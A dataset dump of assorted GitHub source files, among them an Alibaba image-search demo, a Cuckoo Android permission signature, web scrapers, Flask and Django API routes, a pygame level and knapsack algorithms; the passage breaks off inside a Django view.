seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6877383992 | #from IPython.display
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from IPython.display import display
from IPython.core.display import HTML
import json
from pprint import pprint
import os
import time
#import md5
import hashlib
import os
from aliyunsdkcore.profile import region_provider
from aliyunsdkcore.client import AcsClient
import base64
import aliyunsdkimagesearch.request.v20190325.AddImageRequest as AddImageRequest
import aliyunsdkimagesearch.request.v20190325.DeleteImageRequest as DeleteImageRequest
import aliyunsdkimagesearch.request.v20190325.SearchImageRequest as SearchImageRequest
import os
import time
from pprint import pprint
def list_images(image_folder):
images = {}
for file in os.listdir(image_folder):
if file.endswith(".jpg") or file.endswith(".png"):
image_path = os.path.join(image_folder, file)
# print(os.path.abspath(image_path))
images[image_path] = file
return images
def get_Piccontent_from_file(image_path):
file_object = open(image_path)
file_content = None
try:
file_content1 = file_object.read()
import base64
file_content = base64.b64encode(file_content1) # ('data to be encoded')
# data = base64.b64decode(encoded)
finally:
file_object.close()
return file_content
def my_image_preview(image_path, box, cate, color="red"):
#img1 = Image(filename = image_path, width=100, height=100)
img1 = Image.open(image_path)
if box is not None and box != '':
draw = ImageDraw.Draw(img1)
bb = box.split(",")
x0 = float(bb[0])
y0 = float(bb[2])
x1 = float(bb[1])
x2 = float(bb[3])
draw.rectangle([(x0, y0), (x1, x2)], outline=color)
if cate is not None and cate != "":
draw.text((x0, y0), cate, fill=color)
img = img1
return img
###########################################################
###########################################################
def match_cate_desc(cate_id):
AllCategories = [{'Id': 0, 'Name': 'Tops'}, {'Id': 1, 'Name': 'Dress'},{'Id': 2, 'Name': 'Bottoms'},{'Id': 3, 'Name': 'Bag'}, {'Id': 4, 'Name': 'Shoes'},{'Id': 5, 'Name': 'Accessories'},{'Id': 6, 'Name': 'Snack'},{'Id': 7, 'Name': 'Makeup'},{'Id': 8, 'Name': 'Bottle'},{'Id': 9, 'Name': 'Furniture'},{'Id': 20, 'Name': 'Toy'},{'Id': 21, 'Name': 'Underwear'},{'Id': 22, 'Name': 'Digital device'},{'Id': 88888888, 'Name': 'Other'}]
for c in AllCategories:
if cate_id == c['Id']:
return c['Name']
return 'Other'
def my_image_upload_base(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region):
# load file
request = AddImageRequest.AddImageRequest()
request.set_endpoint(endpoint)
request.set_InstanceName(instanceName)
image_content = {'name': image_name, 'path': image_path, 'cate_id':cate_id, 'cate_desc':cate_desc, 'obj_region':obj_region}
request.set_CustomContent(json.dumps(image_content))
request.set_ProductId(ProductId)
request.set_PicName(image_name)
#if cate_id is not None:
request.set_CategoryId(cate_id)
print("=======", cate_id, image_name)
with open(image_path, 'rb') as imgfile:
encoded_pic_content = base64.b64encode(imgfile.read())
request.set_PicContent(encoded_pic_content)
response = requestClient.do_action_with_exception(request)
r = json.loads(response)
# print(response)
return r
#def my_image_upload_for_category():
def my_image_upload_for_similarity_search(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region):
r = my_image_upload_base(requestClient, endpoint, instanceName, ProductId, image_name, image_path, cate_id, cate_desc, obj_region)
#print("== image upload return result ==")
#pprint(r)
cate_desc = match_cate_desc(r['PicInfo']['CategoryId'])
r['cate_desc'] = cate_desc
r['cate_id'] = r['PicInfo']['CategoryId']
r['obj_region'] = r['PicInfo']['Region']
#pprint(r)
#display(my_image_preview(image_path, r['obj_region'], r['cate_desc']))
#print(image_path, ' | found category_desc: ', r['cate_desc'], r['cate_id'], ' | found category_id: ', r['cate_id'], ' | found region: ', r['obj_region'])
return r
###########################################################
###########################################################
def my_image_search_base(requestClient, instanceName, image_path):
request = SearchImageRequest.SearchImageRequest()
request.set_InstanceName(instanceName)
with open(image_path, 'rb') as imgfile:
encoded_pic_content = base64.b64encode(imgfile.read())
request.set_PicContent(encoded_pic_content)
response = requestClient.do_action_with_exception(request)
r = json.loads(response)
#pprint(r)
return r
def my_image_search_for_category_detection(requestClient, instanceName, image_path):
r = my_image_search_base(requestClient, instanceName, image_path)
#r = json.loads(r)
#pprint(r)
category_desc = ''
for c in r['PicInfo']['AllCategories']:
if r['PicInfo']['CategoryId'] == c['Id']:
category_desc = c['Name']
r['cate_desc'] = category_desc
r['cate_id'] = r['PicInfo']['CategoryId']
r['obj_region'] = r['PicInfo']['Region']
return r
def my_image_search_for_category_detection_display(requestClient, instanceName, image_path):
r = my_image_search_for_category_detection(requestClient, instanceName, image_path)
display(my_image_preview(image_path, r['obj_region'], r['cate_desc']))
#print(image_path, ' | found category_desc: ', r['cate_desc'], r['cate_id'], ' | found category_id: ', r['cate_id'], ' | found region: ', r['obj_region'])
return r
###########################################################
###########################################################
def my_image_search_for_similarity(requestClient, instanceName, image_path):
r = my_image_search_base(requestClient, instanceName, image_path)
#r = json.loads(r)
#pprint(r)
category_desc = ''
for c in r['PicInfo']['AllCategories']:
if r['PicInfo']['CategoryId'] == c['Id']:
category_desc = c['Name']
#pprint(r)
#print(image_path, 'found category_desc: ', category_desc, r['PicInfo']['Category'], 'found category_id: ', r['PicInfo']['Category'], 'found region: ', r['PicInfo']['Region'])
#image_similar_name = r['Auctions'][1]['PicName']
#image_similar_path = r['Auctions'][1]['CustomContent']
image_similar_name = json.loads(r['Auctions'][1]['CustomContent'])['name']
image_similar_path = json.loads(r['Auctions'][1]['CustomContent'])['path']
image_similar_score = r['Auctions'][1]['SortExprValues']
category_desc = json.loads(r['Auctions'][1]['CustomContent'])['cate_desc']
obj_region = json.loads(r['Auctions'][1]['CustomContent'])['obj_region']
print(image_path)
print("similar score: ", image_similar_score, "similar image: ", image_similar_path)
#print(r['Auctions']['Auction'][1])
img1 = my_image_preview(image_path, obj_region, category_desc)
img2 = my_image_preview(image_similar_path, '0,0,0,0', 'most_similart_to', 'green')
img_height = img1.size[1]
if img1.size[1] < img2.size[1]:
img_height = img2.size[1]
img = Image.new('RGB', (img1.size[0]+img2.size[0]+40, img_height), "white")
img.paste(img1, (0, 0))
img.paste(img2, (img1.size[0]+40, 0))
#print(img)
draw = ImageDraw.Draw(img)
draw.text((img1.size[0]+20, img_height/2), '=>', fill="green")
draw.text((img1.size[0]+20, img_height/2+10), 'most', fill="red")
draw.text((img1.size[0]+20, img_height/2+20), 'similar', fill="red")
draw.text((img1.size[0]+20, img_height/2+30), 'to', fill="red")
draw.text((img1.size[0]+20, img_height/2+40), '=>', fill="green")
sim_score = "{0:.0%}".format(float(image_similar_score.split(';')[0]))
draw.text((img1.size[0]+20, img_height/2+50), image_similar_score, fill="red")
#display(img1)
#display(img2)
display(img)
return r
| jhs2jhs/AlibabaCloud_ImageSearch_Demo_py2 | myutil.py | myutil.py | py | 8,204 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "base64.b64encode",
"line_num... |
6994057460 | from lib.cuckoo.common.abstracts import Signature
class AndroidGooglePlayDiff(Signature):
name = "android_google_play_diff"
description = "Application Permissions On Google Play Differ (Osint)"
severity = 3
categories = ["android"]
authors = ["Check Point Software Technologies LTD"]
minimum = "2.0"
def on_complete(self):
apk_permission_list = []
for perm in self.get_apkinfo("manifest", {}).get("permissions", []):
apk_permission_list.append(perm["name"])
google_permission_list = []
for perm in self.get_googleplay("permissions", []):
google_permission_list.append(perm)
permission_diff = \
list(set(google_permission_list) - set(apk_permission_list))
if permission_diff:
self.mark(permissions=permission_diff)
return True
| cuckoosandbox/community | modules/signatures/android/android_google_play_diff.py | android_google_play_diff.py | py | 867 | python | en | code | 312 | github-code | 36 | [
{
"api_name": "lib.cuckoo.common.abstracts.Signature",
"line_number": 3,
"usage_type": "name"
}
] |
41935148033 | import json
import re
from datetime import datetime
from newspaper import Article
i = 0 # id number
file_path="./MK.json"
news_format_json = {}
news_format_json['MK'] = []
for y in range(2020, 2021):
for m in range(1, 2):
for n in range(0, 10001):
url = "https://www.mk.co.kr/news/economy/view/{}/{:02d}/{}/".format(y, m, n) # "economy" is meaningless because article shown is determined by 'n'
art = Article(url, keep_article_html=True)
try:
art.download()
art.parse()
art2 = art.text.split()
except:
print("***** error article *****")
continue
if len(art2) == 0:
print("***** blank article *****")
continue
print(i)
# print("\n{}, {}, {}\n".format(y, m, n))
# print(art.title)
# print(art.authors)
# print(art.text)
match = re.search("\d{4}\.\d{2}\.\d{2}", art.html)
dt = datetime.strptime(match.group(), "%Y.%m.%d")
news_format_json['MK'].append({
"id": i,
"title": art.title,
"text": art.text,
"timestamp": [dt.year, dt.month, dt.day],
"html": art.article_html
})
i += 1
with open(file_path, 'w', encoding='utf-8') as outfile:
json.dump(news_format_json, outfile, indent=4, ensure_ascii=False)
print(news_format_json)
| hyeonoir/Stocksnet | MK.py | MK.py | py | 1,571 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "newspaper.Article",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "datetime.datet... |
43062682888 | import json
import scrapy
from scrapy.crawler import CrawlerProcess
def decodeEmail(e):
de = ""
k = int(e[:2], 16)
for i in range(2, len(e) - 1, 2):
de += chr(int(e[i:i + 2], 16) ^ k)
return de
headers = {
'Host': 'ufcstats.com',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'en-IN,en;q=0.9',
}
uniqe_clssses = []
class WEbCrawlerInS(scrapy.Spider):
name = 'example'
player_map = {x["url"]: x for x in json.loads(open('player_data.json', 'r', encoding='utf-8-sig').read())}
def start_requests(self):
yield scrapy.Request(
url='http://ufcstats.com/statistics/events/completed?page=all',
headers=headers, callback=self.parse,
)
def parse(self, response):
for i in response.css('table.b-statistics__table-events tr.b-statistics__table-row'):
try:
event_url = i.css('td.b-statistics__table-col:nth-child(1) a::attr(href)').get(default="").strip()
yield scrapy.Request(
url=event_url,
headers=headers, callback=self.parse_events
)
except:
pass
def parse_events(self, response):
for i in response.css('tbody.b-fight-details__table-body tr.b-fight-details__table-row'):
for k in i.css('td:nth-child(2) > p > a::attr(href)').getall():
yield scrapy.Request(
url=k,
headers=headers, callback=self.parse_fighter_data
)
def parse_fighter_data(self, response):
def getClaenList(lst):
return "".join([x.strip() for x in lst if x.strip() != ""])
record = response.css('body > section > div > h2 > span.b-content__title-record::text').get(default="").replace(
'Record:', '').strip()
wins,losses,draws = record.split('-')
dataset = {'name': response.css('body > section > div > h2 > span.b-content__title-highlight::text').get(
default="").strip(),
'Record': record, "url": response.url,"wins":wins,"losses":losses,"draws":draws}
for i in response.css('ul li.b-list__box-list-item.b-list__box-list-item_type_block'):
key = i.css('i::text').get(default="").replace(':', '').strip()
val = getClaenList(i.css('::text').getall()).replace(key, '').replace(':', '').strip()
dataset[key] = val
yield dataset
if __name__ == "__main__":
settings = {
# 'FEED_EXPORT_ENCODING': 'utf-8-sig',
# 'FEED_EXPORT_BATCH_ITEM_COUNT': 100000,
'FEED_FORMAT': 'json', # csv, json, xml
'FEED_URI': "player_data.json", #
'ROBOTSTXT_OBEY': False,
# Configure maximum concurrent requests performed by Scrapy (default: 16)
'CONCURRENT_REQUESTS': 5,
'CONCURRENT_REQUESTS_PER_DOMAIN': 2500,
'RETRY_ENABLED': False,
'COOKIES_ENABLED': True,
'LOG_LEVEL': 'INFO',
'DOWNLOAD_TIMEOUT': 700,
# 'DOWNLOAD_DELAY': 0.15,
'RETRY_TIMES': 10,
'HTTPCACHE_ENABLED': True,
'HTTPCACHE_EXPIRATION_SECS': 0,
'HTTPCACHE_DIR': 'httpcache_new',
'HTTPCACHE_IGNORE_HTTP_CODES': [int(x) for x in range(399, 600)],
'HTTPCACHE_STORAGE': 'scrapy.extensions.httpcache.FilesystemCacheStorage'
}
c = CrawlerProcess(settings)
c.crawl(WEbCrawlerInS)
c.start()
| frankamania/Scrapers | ufcstats.com/ufcstats.com_parse_player_data.py | ufcstats.com_parse_player_data.py | py | 3,749 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrapy.Spider",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "json.loads",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "scrapy.Request",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "scrapy.Request",
"li... |
9748891676 | from flask import request, Blueprint, abort
from models.alarm import Alarm
from models.response import ResponseJSON
alarm_routes = Blueprint("alarm", __name__, url_prefix="/server/alarm")
@alarm_routes.route("/", methods=["POST"])
def add_alarm():
if not request.json or 'name' not in request.json:
abort(400)
alarm = Alarm(request.json["name"]).save()
return ResponseJSON(True, alarm.serialize(), None).serialize(), 201
@alarm_routes.route("/<int:aid_alarm>", methods=["DELETE"])
def delete_alarm(aid_alarm):
alarm = Alarm.query.get(aid_alarm)
if not alarm:
return ResponseJSON(False, None, "Does not exist").serialize(), 404
alarm.delete()
return ResponseJSON(True, None, None).serialize(), 200
@alarm_routes.route("/<int:aid_alarm>", methods=["PUT"])
def update_alarm(aid_alarm):
if len(request.args) == 0 or not request.args.get("name") and not request.args.get("desc"):
abort(400)
alarm = Alarm.query.get(aid_alarm)
if not alarm:
return ResponseJSON(False, None, "Does not exist").serialize(), 404
if request.args.get("name"):
if not request.json or "name" not in request.json:
abort(400)
alarm.name = request.json["name"]
elif request.args.get("desc"):
if not request.json or "description" not in request.json:
abort(400)
alarm.description = request.json["description"]
alarm.update()
return ResponseJSON(True, alarm.serialize(), None).serialize(), 200
@alarm_routes.route("/<int:aid_alarm>", methods=["GET"])
def get_alarm(aid_alarm):
alarm = Alarm.query.get(aid_alarm)
if not alarm:
return ResponseJSON(False, None, "Does not exist").serialize(), 404
return ResponseJSON(True, alarm.serialize(), None).serialize(), 200
| byUNiXx/kivy_flask_gps | server/src/routes/alarm.py | alarm.py | py | 1,817 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.request.json",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "flask.abort",
... |
71654885545 | import sys
import re
import ranges
def read_cleanup_file(filename, full_overlaps_only):
sum = 0
with open(filename, 'r') as fp:
for line in fp:
toks = re.split(',|-', line.strip())
if len(toks) != 4:
raise Exception('wrong line format. tokens: %s' % toks)
r1 = ranges.Range(int(toks[0]), int(toks[1]), include_end=True)
r2 = ranges.Range(int(toks[2]), int(toks[3]), include_end=True)
r12 = r1.union(r2)
if (full_overlaps_only == True and (r12 == r1 or r12 == r2))\
or (full_overlaps_only == False and r12 != None):
sum += 1
return sum
if __name__=='__main__':
if len(sys.argv) != 2:
print('usage: python main.py INPUT')
full_overlaps = read_cleanup_file(sys.argv[1], True)
print('total full overlaps: %d' % full_overlaps)
partial_overlaps = read_cleanup_file(sys.argv[1], False)
print('total partial overlaps: %d' % partial_overlaps)
| dakopoulos/aoc22 | day4/main.py | main.py | py | 1,004 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.split",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "ranges.Range",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "ranges.Range",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 21,
... |
13491582898 | from datetime import datetime
import csv, os
class File:
def __init__(self, name, date):
self.fr = None
self.fw = None
self.fa = None
self.filename = f"./files/{name}_{date}.csv"
def filename_change(self, filename):
self.filename = filename
def file_write(self, title, data):
self.fw.write(f'[{title}] data = {data}')
def file_write_time(self, title, address, data):
self.fw = open(self.filename, "a")
self.fw.write(f'[{title}] address = {address} / data = {data} / datetime = {datetime.now()}\n')
self.fw.close()
def file_write_data(self, data):
self.fw = open(f"/files/{self.filename}.txt", "a")
self.fw.write(data)
self.fw.close()
def file_write_csv(self, data):
data.append(str(datetime.now())[10:19])
if os.path.isfile(os.path.join(os.getcwd(),self.filename.replace("./","").replace("/","\\"))):
f = open(self.filename, "a", newline='')
wr = csv.writer(f)
wr.writerow(data)
f.close()
else :
f = open(self.filename, "w", newline='')
wr = csv.writer(f)
wr.writerow(["spo2", "spo2 confidence", "hr", "hr confidence", "walk", "run",
"motion flag", "activity", "battery", "scd", "acc x", "acc y", "acc z",
"gyro x", "gyro y", "gyro z", "fall detect", "temp", "pressure", "time"])
wr.writerow(data)
f.close()
def file_write_close(self):
self.fw.close()
def return_today(self):
today = str(datetime.now())
return f"{today[:10]} {today[11:13]}-{today[14:16]}-{today[17:19]}" | jjaekkaemi/dgsb_app | file.py | file.py | py | 1,697 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.now",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.now",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "datetim... |
43552330299 | import pytest
from rest_framework import status
from tests.factories import JobFactory
@pytest.mark.django_db
def test_selection_create(client, user_access_token):
user, access_token = user_access_token
job_list = JobFactory.create_batch(10)
data = {
"name": "Название подборки",
"items": [job.pk for job in job_list]
}
expected_data = {
"id": 1,
"owner": user.username,
"name": "Название подборки",
"items": [job.pk for job in job_list]
}
response = client.post("/selection/", data=data, HTTP_AUTHORIZATION=f"Bearer {access_token}")
assert response.status_code == status.HTTP_201_CREATED
assert response.data == expected_data
| VyacheslavTim/Lesson31 | tests/selection/selection_test.py | selection_test.py | py | 750 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tests.factories.JobFactory.create_batch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "tests.factories.JobFactory",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "rest_framework.status.HTTP_201_CREATED",
"line_number": 26,
"usage_typ... |
36319285982 | from random import randint
from Savedata import Savedata
from entity.Entity import EntInt
from entity.Player import Player
from entity.Enemy.Boss import Boss
from entity.Enemy.Malicious import Malicious
from entity.Enemy.SimpleEnemy import SimpleEnemy
from entity.item.Shield import Shield
from entity.item.CadenceUp import CadUp
import pygame
class Level():
enemy=[]
end=False
def __init__(self,screen,screenw,screenh,savedata : Savedata, level_number) -> None:
self.bigarial=pygame.font.Font('C:/Windows/Fonts/arial.ttf',100)
self.arial=pygame.font.Font('C:/Windows/Fonts/arial.ttf',20)
self.entint=EntInt()
self.screen=screen
self.screenw=screenw
self.screenh=screenh
self.savedata=savedata
self.entint.killcount=0
self.nb_player=1
self.number=level_number
self.waves=self.get_waves()
self.current_wave=-1
self.win=False
self.pre_next=False
self.next=False
self.cooldown_until_next=1000
self.start_cooldown=0
def spawn_enemys_in_wave(self,wave : str):
for i in range(len(wave)//2):
nb=int(wave[2*i])
type=wave[2*i+1]
if(type=='R'):
for j in range(nb):
SimpleEnemy(self.entint,self.screen,(randint(0,self.screenw-1),50))
elif(type=='M'):
for j in range(nb):
Malicious(self.entint,self.screen,(randint(0,self.screenw-1),50))
elif(type=='B'):
for j in range(nb):
Boss(self.entint,self.screen,(randint(0,self.screenw-1),50))
def get_waves(self):
text=open("Levels/"+str(self.number)+".txt")
content=text.read()
return content.split('/')
def start(self):
if(self.entint.players.__len__()==0):
Player(self.entint,scr=self.screen,pos=(self.screenw/2, self.screenh/2),key=(pygame.K_s,pygame.K_z,pygame.K_q,pygame.K_d,pygame.K_g))
if(self.nb_player==2):
Player(self.entint,scr=self.screen,pos=(self.screenw/2, self.screenh/2),key=(pygame.K_DOWN,pygame.K_UP,pygame.K_LEFT,pygame.K_RIGHT,pygame.K_KP2))
self.clock=pygame.time.Clock()
def update(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
dt = self.clock.tick(120)
#pygame.draw.rect(self.screen, (135,206,235), pygame.Rect(0,0,self.screenw, self.screenh))
self.entint.update(dt)
if(len(self.entint.players)==0):
#run=False
game_over=self.bigarial.render("Game Over",False,(0,0,0))
self.screen.blit(game_over,((self.screenw-game_over.get_width())/2,self.screenh/2))
if((len(self.entint.enemys)==0)&(self.current_wave<len(self.waves))):
self.current_wave+=1
if(self.current_wave>=len(self.waves)):
self.win=True
else:
self.spawn_enemys_in_wave(self.waves[self.current_wave])
if(self.win):
level_cleared=self.bigarial.render("Level Cleared",False,(0,0,0))
self.screen.blit(level_cleared,((self.screenw-level_cleared.get_width())/2,self.screenh/2))
if(not self.pre_next):
self.start_cooldown=pygame.time.get_ticks()
self.pre_next=True
else:
if(pygame.time.get_ticks()-self.start_cooldown>self.cooldown_until_next):
self.next=True
self.info_print()
if(pygame.key.get_pressed()[pygame.K_ESCAPE]):
#print(self.entint.killcount)
self.savedata.totalkillcount+=self.entint.killcount
self.savedata.save()
self.end=True
#print(self.entint.players.sprites()[0].buffs,self.entint.players.sprites()[1].buffs)
#print(len(self.entint.items))
def info_print(self):
fps=self.arial.render("fps :" + str(int(self.clock.get_fps())),False,(0,0,0),(255,255,255))
self.screen.blit(fps,(self.screenw-70,self.screenh-30))
kc=self.arial.render("killcount :" + str(self.entint.killcount),False,(0,0,0),(255,255,255))
self.screen.blit(kc,(0,self.screenh-30))
| 2doupo/Shooter | Levels/Level.py | Level.py | py | 5,657 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Savedata.Savedata",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "pygame.font.Font",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font"... |
30167619288 | from itertools import combinations
import random
# If true, extra inforamtion will appear
DEBUG = False
# O(n*log(n))
def greedy(v, w, W):
n = len(w)
profit = [(0, i) for i in range(n)]
x = [False for i in range(n)]
for i in range(n):
profit[i] = (v[i]/w[i],i)
profit.sort(key = lambda profit: profit[0], reverse = True)
for e in profit:
if (w[e[1]] > W): return x
x[e[1]] = True
W = W - w[e[1]]
return x
# O(nW),
def dynamic(v, w, W):
n = len(v)
K = [[0 for i in range(W + 1)] for j in range(n + 1)]
for i in range(n + 1):
for j in range(W + 1):
if i == 0 or j == 0:
K[i][j] = 0
elif w[i-1] <= j:
K[i][j] = max(v[i-1] + K[i-1][j-w[i-1]], K[i-1][j])
else:
K[i][j] = K[i-1][j]
i, j = n, W
x = [False for i in range(n)]
while i > 0 and j > 0:
if (K[i][j] == K[i-1][j]):
i -= 1
else:
x[i-1] = True
j -= w[i-1]
i -= 1
return x
#O(2^n)
def bruteforce(v, w, W):
n = len(v)
x = []
max_value = 0
tuples = list(zip(w, v))
for number_of_items in range(n):
for combination in combinations(tuples, number_of_items+1):
weight = sum([tup[0] for tup in combination])
value = sum([tup[1] for tup in combination])
if (max_value < value and weight <= W):
max_value = value
x = [False for i in range(n)]
for tup in combination:
x[tuples.index(tup)] = True
return x
#O(n)
def genetic(v, w, W, POP_SIZE=10, MAX_GEN=200):
N = len(v)
PARENTS_PERCENTAGE = 0.4
MUTATION_CHANCE = 0.2
PARENT_CHANCE = 0.1
def fitness(perm):
value = 0
weight = 0
index = 0
for i in perm:
if index >= N:
break
if (i == 1):
value += v[index]
weight += w[index]
index += 1
if weight > W: return 0
else: return value
def generate_population(number_of_individuals):
return [[random.randint(0,1) for x in range (0,N)] for x in range (0,number_of_individuals)]
def mutate(perm):
r = random.randint(0,len(perm)-1)
if (perm[r] == 1): perm[r] = 0
else: perm[r] = 1
def evolve(perm):
parents_length = int(PARENTS_PERCENTAGE*len(perm))
parents = perm[:parents_length]
nonparents = perm[parents_length:]
for np in nonparents:
if PARENT_CHANCE > random.random():
parents.append(np)
for p in parents:
if MUTATION_CHANCE > random.random():
mutate(p)
children = []
desired_length = len(perm) - len(parents)
while len(children) < desired_length :
m = perm[random.randint(0,len(parents)-1)]
f = perm[random.randint(0,len(parents)-1)]
half = round(len(m)/2)
child = m[:half] + f[half:]
if MUTATION_CHANCE > random.random():
mutate(child)
children.append(child)
parents.extend(children)
return parents
generation = 1
population = generate_population(POP_SIZE)
for g in range(0,MAX_GEN):
if DEBUG: print (f"Generation {generation} with {len(population)}")
population = sorted(population, key=lambda x: fitness(x), reverse=True)
if DEBUG:
for i in population:
print(f"{i}, fit: {fitness(i) }")
population = evolve(population)
generation += 1
if (fitness(population[0]) == 0): return [False for i in range(N)]
else: return population[0] | X-V-III/OK2020 | algorithms.py | algorithms.py | py | 3,274 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "itertools.combinations",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "random.random",
... |
41903865929 | import sys
from django.db.models import Avg, Variance
from django.shortcuts import render
from rest_framework import generics
from rest_framework.decorators import api_view, parser_classes
from rest_framework.generics import ListCreateAPIView
from rest_framework.parsers import JSONParser
from rest_framework.response import Response
from rest_framework import status
import json
from rest_framework.views import APIView
import collections
from .models import ExchangeRate, Currency
from .model_serializer import ExchangeRateSerializer, ExchangeRateListSerializer
query_set = ExchangeRate.objects.all()
serializer_class = ExchangeRateSerializer
@api_view(['GET'])
def test_get(request):
print("request:", request.query_params.get("q"))
return Response({"message": "Hello, world!"})
@api_view(['POST'])
@parser_classes((JSONParser,))
def crate_exchange_rate(request):
request_data = request.data
date = request_data['date']
from_currency = request_data['from_currency']
to_currency = request_data['to_currency']
rate_value = request_data['rate_value']
exchange_rate_ls = ExchangeRate.objects.filter(date=date, from_currency=from_currency, to_currency=to_currency)
exchange_rate = ExchangeRate()
if exchange_rate_ls:
exchange_rate = exchange_rate_ls[0]
exchange_rate.rate_value = rate_value
else:
from_curr = Currency.objects.get(currency_code=from_currency)
to_curr = Currency.objects.get(currency_code=to_currency)
exchange_rate.date = date
exchange_rate.from_currency = from_curr
exchange_rate.to_currency = to_curr
exchange_rate.rate_value = rate_value
exchange_rate.save()
return Response(ExchangeRateSerializer(exchange_rate).data, status=status.HTTP_200_OK)
def get_rate_average(rate_date, previous_date, from_curr, to_curr):
from django.db.models import Avg
return ExchangeRate.objects.filter(date__range=(previous_date, rate_date), from_currency=from_curr,
to_currency=to_curr).aggregate(Avg('rate_value'))
from collections import OrderedDict
def ordered_dict_prepend(dct, key, value, dict_setitem=dict.__setitem__):
root = dct._OrderedDict__root
first = root[1]
if key in dct:
link = dct._OrderedDict__map[key]
link_prev, link_next, _ = link
link_prev[1] = link_next
link_next[0] = link_prev
link[0] = root
link[1] = first
root[1] = first[0] = link
else:
root[1] = first[0] = dct._OrderedDict__map[key] = [root, first, key]
dict_setitem(dct, key, value)
class GetExchangeLIst(ListCreateAPIView):
queryset = ExchangeRate.objects.none()
serializer_class = ExchangeRateSerializer
def get_queryset(self):
queryset = ExchangeRate.objects.all()
return queryset
@api_view(['GET'])
def get_exchange_track(request):
print("request_data", request.query_params)
rate_date = request.query_params.get("date")
if not rate_date:
return Response('Invalid Date parameter', status=status.HTTP_404_NOT_FOUND)
offset = request.query_params.get("offset")
if not offset:
return Response('Invalid Offset parameter', status=status.HTTP_404_NOT_FOUND)
from datetime import datetime, timedelta
previous_date = datetime.strptime(rate_date, "%Y-%m-%d").date() - timedelta(days=int(offset))
exchange_list = ExchangeRate.objects.filter(date=rate_date)
response_serializer = ExchangeRateSerializer(exchange_list, many=True)
average_dict = {er.from_currency.currency_code+'-'+er.to_currency.currency_code: get_rate_average(rate_date, previous_date, er.from_currency,
er.to_currency) for er in exchange_list}
print(response_serializer.data)
result_list =[]
for d in response_serializer.data:
d['average_val'] = average_dict[d['from_currency']+'-'+d['to_currency']]['rate_value__avg']
result_list.append(d)
return Response(result_list)
@api_view(['GET'])
def get_exchange_average(request):
from_currency = request.query_params.get("from_currency")
if not from_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
to_currency = request.query_params.get("to_currency")
if not to_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
offset = request.query_params.get("offset")
if not offset:
return Response('Invalid Offset parameter', status=status.HTTP_404_NOT_FOUND)
from_curr = Currency.objects.get(currency_code=from_currency)
to_curr = Currency.objects.get(currency_code=to_currency)
_vals ={'from_currency':from_curr,'to_currency':to_curr}
from django.db.models import Q
exchange_rate_list = ExchangeRate.objects.filter(Q(from_currency=from_curr) & Q(to_currency=to_curr)).order_by('-date')[:int(offset)]
response_serializer = ExchangeRateSerializer(exchange_rate_list, many=True)
avr_val = exchange_rate_list.aggregate(Avg('rate_value'))
variance = exchange_rate_list.aggregate(Variance('rate_value'))
aver_var = collections.OrderedDict()
aver_var['average_val'] =avr_val
aver_var['variance'] =variance
data = response_serializer.data
i =0
dict_response ={}
for d in data:
i=i+1
dict_response[i]=d
dict_response[i+1]=aver_var
print(data)
return Response(dict_response)
@api_view(['DELETE'])
def delete_exchange(request):
from_currency = request.query_params.get("from_currency")
if not from_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
to_currency = request.query_params.get("to_currency")
if not to_currency:
return Response('Invalid from_currency parameter', status=status.HTTP_404_NOT_FOUND)
date = request.query_params.get("date")
if not date:
